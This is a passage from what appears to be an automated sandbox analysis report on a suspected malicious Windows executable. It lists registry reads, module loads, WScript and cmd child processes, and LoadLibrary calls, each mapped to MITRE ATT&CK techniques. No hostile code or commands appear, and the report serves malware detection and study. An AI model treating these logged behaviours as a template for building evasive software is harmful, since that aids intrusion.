\"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"GDI32.DLL\" at base 77140000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76600000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71880000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"KERNEL32\" at base 76260000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 68cc0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"ADVAPI32.DLL\" at base 77190000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6ba00000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"SHLWAPI.DLL\" at base 76720000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"VERSION.DLL\" at base 74690000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 649a0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"USER32.DLL\" at base 75540000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"MSCOREE.DLL\" at base 6ba90000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"PSAPI.DLL\" at base 75530000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"RPCRT4.DLL\" at base 768b0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"KERNEL32.DLL\" at base 76260000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63590000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"OLE32.DLL\" at base 76470000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"CRYPTBASE.DLL\" at base 750f0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e80000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6f7f0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 68c30000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 62b30000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 65730000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 61cc0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.WINDOWS.FORMS\\V4.0_4.0.0.0__B77A5C561934E089\\UXTHEME.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"UXTHEME.DLL\" at base 73e80000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 614a0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 65620000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 60d20000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6b8c0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"NTDLL.DLL\" at base 772f0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"SHELL32.DLL\" at base 75610000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77440000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"PROFAPI.DLL\" at base 75210000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"BCRYPT.DLL\" at base 74d10000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"CRYPTSP.DLL\" at base 74c00000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74990000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"IMM32.DLL\" at base 76600000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"COMCTL32.DLL\" at base 71e40000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"GDIPLUS.DLL\" at base 73b50000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\WINSXS\\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.23894_NONE_5C0BE957A009922E\\GDIPLUS.DLL\" at base 73b50000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76260000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"C:\\NTDLL.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"SSPICLI.DLL\" at base 75080000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\RASAPI32.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"RASAPI32.DLL\" at base 6bcf0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"RTUTILS.DLL\" at base 73450000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77440000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77440000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"WS2_32.DLL\" at base 76420000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74bc0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74720000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74bb0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"RASMAN.DLL\" at base 6d0a0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WINHTTP.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"WINHTTP.DLL\" at base 714e0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"CREDSSP.DLL\" at base 748c0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"IPHLPAPI.DLL\" at base 71ee0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"DHCPCSVC6.DLL\" at base 71200000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"DHCPCSVC.DLL\" at base 71180000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"NSI.DLL\" at base 77460000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"CFGMGR32.DLL\" at base 75340000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"OLEAUT32.DLL\" at base 76680000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77440000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75190000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77440000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\IPHLPAPI.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"DNSAPI.DLL\" at base 74a80000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"RASADHLP.DLL\" at base 6c890000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71220000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\SECUR32.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"SECUR32.DLL\" at base 74f30000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 74a00000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"NCRYPT.DLL\" at base 74d30000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 748d0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\CRYPT32.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"CRYPT32.DLL\" at base 75400000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CRYPT32.DLL\" at base 0\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"USERENV.DLL\" at base 753b0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"GPAPI.DLL\" at base 747d0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"PROPSYS.DLL\" at base 73fb0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"COMCTL32.DLL\" at base 740f0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"APPHELP.DLL\" at base 750a0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"CLBCATQ.DLL\" at base 76820000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a8b0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"SETUPAPI.DLL\" at base 76fa0000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71880000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WScript.exe\" loaded module \"KERNEL32\" at base 76260000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WScript.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 68cc0000\n \"WScript.exe\" loaded module \"CRYPTSP.DLL\" at base 74c00000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74990000\n \"WScript.exe\" loaded module \"ADVAPI32.DLL\" at base 77190000\n \"WScript.exe\" loaded module \"CRYPTBASE.DLL\" at base 750f0000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 6c690000\n \"WScript.exe\" loaded module \"OLE32.DLL\" at base 76470000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPT32.DLL\" at base 75400000\n \"WScript.exe\" loaded module \"IMM32.DLL\" at base 76600000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 68da0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 65720000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 656f0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHOM.OCX\" at base 656c0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 76470000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 76340000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71880000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 76260000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005752)\n 